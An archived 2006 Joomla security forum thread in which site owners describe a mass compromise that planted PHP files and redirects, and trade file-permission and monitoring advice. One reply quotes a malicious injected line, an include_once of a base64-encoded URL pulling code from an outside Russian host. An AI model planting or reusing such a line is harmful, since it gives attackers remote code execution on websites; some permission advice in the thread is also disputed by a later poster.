Site Hacked - 2 files uplaoded...

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Site Hacked - 2 files uplaoded...

Post by TWDesigns » Mon Jan 09, 2006 5:13 am

Here is what was uploaded to all the sites that were hacked.  I asked before posting this to make sure it was ok and I'm no programmer so someone else can take a looksee.
And
I've changed every pass I have and restored backups to be safe.  So if anything above looks like or decodes to a password no worries  :P
All sites were the latest Joomla! (patched)
One site was a much older version that I used for testing.. it had MOS_ tables so probably one of the firsts. It was off by it's self on a seperate domain.
No other software was installed on any other than Joomla! and 3rd party components.  None were components mentioned in other threads by users with the same problem.

.... Anything else I can give as far as information let me know!  ???

User avatar
webguy
Joomla! Ace
Joomla! Ace
Posts: 1397
Joined: Thu Aug 18, 2005 6:40 am
Location: Best, Netherlands
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by webguy » Mon Jan 09, 2006 7:43 am

Exactly the same on the sites of my client.
My client was running Mambo 4.5.2.3.

Question is: is this Mambo/Joomla related or is it a server issue?
René Kreijveld
http://www.renekreijveld.nl | Joomla! professional

j00be
Joomla! Apprentice
Joomla! Apprentice
Posts: 9
Joined: Fri Nov 11, 2005 2:32 pm

Re: Site Hacked - 2 files uplaoded...

Post by j00be » Mon Jan 09, 2006 9:03 am

Re TWDesigns Post

Can you give us a list of third party modules, bots and components you had installed? This could help define the issue better.

Thanks!

Christer
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sun Jan 08, 2006 1:42 pm

Re: Site Hacked - 2 files uplaoded...

Post by Christer » Mon Jan 09, 2006 9:17 am

It's not only all versions of joomla and mambo who are having these problems. Also php nuke and other php websites. The strange thing is that my html files are working fine. At my hosting company there are a lot of people who use other php scripts and these have the same symptones.

1. Blank white page
2 Redirect to a landing page (ppc)

That is why I think It's a server wide hack.

If your page redirects to a landing page look at the whois of the owner. Maybe it's the same one as mine. Some guy from Russia.

User avatar
webguy
Joomla! Ace
Joomla! Ace
Posts: 1397
Joined: Thu Aug 18, 2005 6:40 am
Location: Best, Netherlands
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by webguy » Mon Jan 09, 2006 9:19 am

Christer,

Thanks for your explanation. I have experienced exactly the same thing.
Can you pleasy clarify what you mean by:
Christer wrote: If your page redirects to a landing page look at the whois of the owner. Maybe it's the same one as mine. Some guy from Russia.
?
René Kreijveld
http://www.renekreijveld.nl | Joomla! professional

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Mon Jan 09, 2006 10:05 am

I didn't see any posts over at postnuke or phpbb yet which is why I was worried it was a joomla/mambo issues, maybe I didn't look hard enough.  Anyways I just finished restoring all my sites (5am later), time for some shut eye  ;)

Maybe the next few days will shed more light on the problem and what software is causing it.

Christer
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sun Jan 08, 2006 1:42 pm

Re: Site Hacked - 2 files uplaoded...

Post by Christer » Mon Jan 09, 2006 11:03 am

I said that so we could check if it's just one person who is doing this are multiple hackers. I suppose we are all hosted somewhere else but you never know.

User avatar
guilliam
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4181
Joined: Thu Aug 18, 2005 10:27 am
Location: Sunny City Cebu, Philippines!
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by guilliam » Wed Jan 11, 2006 12:24 am

maybe you can all post where you are hosted.. so you can see if you guys are all hosted under the same roof.

- g
"I was one of those who wondered why people would pay so much $$$$ to do something that was so much fun!" -R. Harkrider, Fortran Code Engr.

http://www.joomlaconsultancy.net

FuzzieDice
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Wed Jan 11, 2006 12:42 am
Location: New York State

Re: Site Hacked - 2 files uplaoded...

Post by FuzzieDice » Wed Jan 11, 2006 2:16 am

You mentioned that two files were 'uploaded'. Can you also give the filenames they were uploaded as?

I've had some blank-page issues in phpBB of late too, even after a full upgrade. But I haven't seen any odd files that didn't seem to belong on the server.

User avatar
coldfrost
Joomla! Apprentice
Joomla! Apprentice
Posts: 33
Joined: Sun Oct 30, 2005 6:20 pm
Location: Norway

Re: Site Hacked - 2 files uplaoded...

Post by coldfrost » Wed Jan 11, 2006 11:56 am

Hi

They have changed many php-files in two of my sites. Would make a very long list, but it is related to components, modules and languages mostly.
Funny thing, I have one of those sites using both Joomla and Lifetype and only Joomla is hit ???

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Wed Jan 11, 2006 1:41 pm

My joomla sites that were locked down didnt get destroyed.  The ones with a open dir took the hit.

I do have a question about this.  I don't have time to look this back up but I think I remember joomla asking that some of the folders have permission 755 in order to function properly, for installing of coms and mods and the cache dir also.  If i set it to that it still tells me it's unwritable....  Anyone know why this is?  777 is the only way I can get the red warnings to turn green.

From a previous reply, the files that are uploaded are normally named..
Date.php
Time.php
Create.pho
Guest.php
there are a couple more but I can't think of them right now.  ALso the STRANGE thing is, the files appeared in the same dir's on all my sites with the same file name.  Like in languages I had date & time on all sites.  Almost like it was written to know where to put which file names..

FuzzieDice
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Wed Jan 11, 2006 12:42 am
Location: New York State

Re: Site Hacked - 2 files uplaoded...

Post by FuzzieDice » Wed Jan 11, 2006 4:24 pm

Another question... do you know if php's 'safe mode' is on, on the hosting server?

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Wed Jan 11, 2006 5:30 pm

Relevant PHP Settings: 
Safe Mode: OFF

FuzzieDice
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Wed Jan 11, 2006 12:42 am
Location: New York State

Re: Site Hacked - 2 files uplaoded...

Post by FuzzieDice » Wed Jan 11, 2006 9:24 pm

If safe mode was turned on, it might be that they wouldn't have been able to tamper with the files as easily. However, the drawback with safe mode being on is that scripts have a hard time writing files they need to, which can result in things like inability to install some modules, components and mambots, uploading files, images, etc.

wayne
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Tue Nov 15, 2005 11:04 am

Re: Site Hacked - 2 files uplaoded...

Post by wayne » Thu Jan 12, 2006 12:02 pm

I got exact same thing, I found this code
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")

will link to : http://bis.iframe.ru/master.php .
anyone know how to provent this happend again.

User avatar
keh
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 188
Joined: Fri Sep 16, 2005 4:55 pm
Location: Oslo
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by keh » Thu Jan 12, 2006 12:37 pm

wayne wrote: anyone know how to provent this happend again.
For starters: When you're finished installing and working with your site, leave as few folders as possible (and files if u have -  index.php i your template- for example) world writeble (chmod'ed to 777). If you leave your template index.php world writeble it's like an invitation to deface your site. Never install components, modules and templates with the new folders and files permissions set to world writeble in the global settings under the server tab. Use Joomla explorer component to control and overwrite files... I guess if you go through the folders that had the extra files in them for the defacement/redirect and the files that got changed, the file permissions was set to world writeable...

jeffmather
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Jan 14, 2006 3:19 am

Re: Site Hacked - 2 files uplaoded...

Post by jeffmather » Sat Jan 14, 2006 3:33 am

I found this site earlier today when I discovered this issue manifesting itself on my server.  At first, I thought it was related to Movable Type, but it appears to be any PHP-enabled host with 777 permissions on directories.  It's also not new, as I discovered my site had been doing this since June.

It's a fairly straightforward problem to clean up (see here) but it might indicate further vulnerabilities on your system.  My problems started after my site picked up a worm from a public computer when I was on vacation in India.  IE users will probably have told you they experienced miscellaneous badness, but it still a good idea to look for files with the same timestamp as the malicious php and .htaccess files.

This all seems related to certain Google hijacking exploits: http://clsc.net/research/google-302-page-hijack.htm.

Good luck.

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Sun Jan 15, 2006 5:33 pm

Thanks for that information Jeff.  I hope they find a fix for this because some DIR's require write access like cache and etc.  I saw a OScommerce installation last night that took a big hit also.  The default installation had TONS of writable directories...

Back to the drawing board.

User avatar
Tonie
Joomla! Master
Joomla! Master
Posts: 16584
Joined: Thu Aug 18, 2005 7:13 am

Re: Site Hacked - 2 files uplaoded...

Post by Tonie » Sun Jan 15, 2006 5:36 pm

A small tip for the cache directory. I have deleted the cache directory and index.html from my install. I created the directory again with JoomlaXplorer (if you have shell access that is even easier). This will give your Apache user ownership of that directory. Copy the index.html file to it, and change the rights to 755. This will make sure that all Joomla components can read/write in this directory, without the 777 rights needed for your cache directory.

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Sun Jan 15, 2006 5:54 pm

Nice tip. Thanks!  :D

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Wed Jan 18, 2006 8:53 pm

I just got hit again with everything locked down... so I thought.  I had installed SMF Bridge and it wrote the dir's as owned by nobody which they gained access from.

Has anyone came up with a solution for the "nobody" problem yet.

PaulEarley
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Wed Aug 31, 2005 4:22 pm

Re: Site Hacked - 2 files uplaoded...

Post by PaulEarley » Sat Jan 21, 2006 7:01 pm

Tonie wrote: I created the directory again with JoomlaXplorer
I might be dense, but I cannot figure out how to add a NEW directory with JoomlaXplorer. Can you tell me how to do this?
Paul Earley

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Sat Jan 21, 2006 8:35 pm

haha, don't feel bad.  I was about to ask the same thing.  Maybe there is a newer version then what we have.

User avatar
Tonie
Joomla! Master
Joomla! Master
Posts: 16584
Joined: Thu Aug 18, 2005 7:13 am

Re: Site Hacked - 2 files uplaoded...

Post by Tonie » Sat Jan 21, 2006 10:37 pm

This took me about 15 minutes to find out just now, done this months ago.

Ok, make sure that the rights on the public_html (the start of your webspace) has 777 rights instead of 755. When opening JoomlaXplorer now, there is a link on the right to create a file or directory. Create the directory, this is done with the Apache user rights. Change the rights of public_html back again, and it should have the configuration you want.

You can only create files or directories with JoomlaXplorer in directories where you have rights to do so.

Sorry for the confusion, I sure was for a moment :).

TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 193
Joined: Thu Sep 01, 2005 7:11 pm
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by TWDesigns » Sat Jan 21, 2006 10:45 pm

LOL Thanks for clearing that up  ;D

PaulEarley
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Wed Aug 31, 2005 4:22 pm

Re: Site Hacked - 2 files uplaoded...

Post by PaulEarley » Sat Jan 21, 2006 10:45 pm

Thanks for that great tip. I never would have figured that out!
Paul Earley

pmarfell
Joomla! Apprentice
Joomla! Apprentice
Posts: 40
Joined: Wed Nov 30, 2005 10:55 am
Location: Baildon, UK

Re: Site Hacked - 2 files uplaoded...

Post by pmarfell » Sun Jan 22, 2006 6:14 pm

I would like to know how people find that they have been "got at"?

There are thousands of files on the server. The action of the virus/bot or whatever might only seen by visitors who will probably just go away and never return.

I am not sure which sections need which access rights. A script would be great but would need root access or to do it through FTP I guess.

Does the tampering always show in modified dates? If it does then the process I have tried will catch things reasonably quickly. I connect via FTP and "dir -R c:\dirlist.txt". Some time later I do the same again but with a different file name and then put the files on a Linux box and "diff file1 file2" to see any diiferences.

What I would like to do is get the listing into a database. Do the comparison, Send an email if there are differences. Accept the differences. Run it again the next day. All by Cron.

PicsOne
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu Feb 23, 2006 5:25 am

Re: Site Hacked - 2 files uplaoded...

Post by PicsOne » Sat Mar 25, 2006 6:37 am

Please, NEVER leave your files to 777. This is the first hole.
I modifie a grate script to change recursively files and directorys to diferente permissions(ej files 644 dirs 775).
Here it is:
http://contribs.org/modules/pbboard/vie ... hp?t=30543

Also run this beatifully utility:
http://miraculixx.freewebspace.com/

Pay atention to yours .htaccess files, the worn also infect this file.
Also read:
http://lists.indymedia.org/pipermail/im ... 05-eq.html

Thank you and sorry for my language
Normando

atela
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Tue Mar 07, 2006 11:37 am
Location: Spain
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by atela » Wed Jun 21, 2006 4:11 pm

:'(

Just discover today that all my joomla & mambo sites have been "hacked" this way... Also some other scripts (4images for example)

I will note all the recommendations about directories, but I know I'm lazy with these kind of things...
http://www.atela.net
Joomla and Opensource for Spain

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Re: Site Hacked - 2 files uplaoded...

Post by RobS » Thu Jun 22, 2006 2:43 am

I am noticing more and more bad information when it comes to security and Joomla.  A lot of which seems to come from inexperience, the rest appears to be due to confusion.  Firstly, to address a comment made by Tonie:
Tonie wrote: A small tip for the cache directory. I have deleted the cache directory and index.html from my install. I created the directory again with JoomlaXplorer (if you have shell access that is even easier). This will give your Apache user ownership of that directory. Copy the index.html file to it, and change the rights to 755. This will make sure that all Joomla components can read/write in this directory, without the 777 rights needed for your cache directory.
You are not achieving any security advantage with this procedure, all you are doing is basically changing the ownership of the directory from your login to the Apache process, most likely the 'nobody' user.  If the attack is coming from a issue with Joomla or PHPBB or any other script on your website (which almost all of the attacks launched against Joomla seem to come from), it is running as 'nobody' and therefore has the same permissions as Apache.  The only thing that this would prevent is from another user on the web server from writing to this directory which in my opinion is a moot point.  You are achieving no practical security benefit from this configuration. 

Additionally, this always seems to need clarification.  For the most secure out of the box configuration, files and directories should be owned by a user that is NOT the same as the apache process user (usually the 'nobody' user).  Files should have permissions 644 and directories should have permissions 755.

Security is like an onion, it works best with many layers of protection.  And as I often regret having to say, it is very difficult to achieve a good level of security in a shared hosting environment.  The tools just are not there. 

@pmarfell
pmarfell wrote: Does the tampering always show in modified dates? If it does then the process I have tried will catch things reasonably quickly. I connect via FTP and "dir -R c:\dirlist.txt". Some time later I do the same again but with a different file name and then put the files on a Linux box and "diff file1 file2" to see any differences.

What I would like to do is get the listing into a database. Do the comparison, Send an email if there are differences. Accept the differences. Run it again the next day. All by Cron.
A good attacker can modify a file without changing the modified timestamps.  However, given the nature of probably all Joomla attacks, this is not something to worry about.  Based on the comments of what you would like to do with this approach of comparing timestamps, you should look at an application called Tripwire.  There is an enterprise addition (read expensive) and an opensource free version available at http://sourceforge.net/projects/tripwire/  You can configure it to monitor many aspects of file or directory stats such as ownership, permissions, timestamp, checksum, etc.  It is very comprehensive and would make a great tool for monitoring Joomla directory structures.  You can also tell it to ignore the modification of certain stats, which is very useful for something like a log file where it will monitor to make sure the permissions and ownership haven't changed but it will ignore changes in the size of the file.  These principles can probably be applied very successfully to monitoring Joomla directory structures if you have the access to the server to install and configure it, which going back to the problem with shared hosting, many people unfortunately do not.  However, you indicated having access to cron, so perhaps you have this type of access.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Locked

Return to “Security - 1.0.x”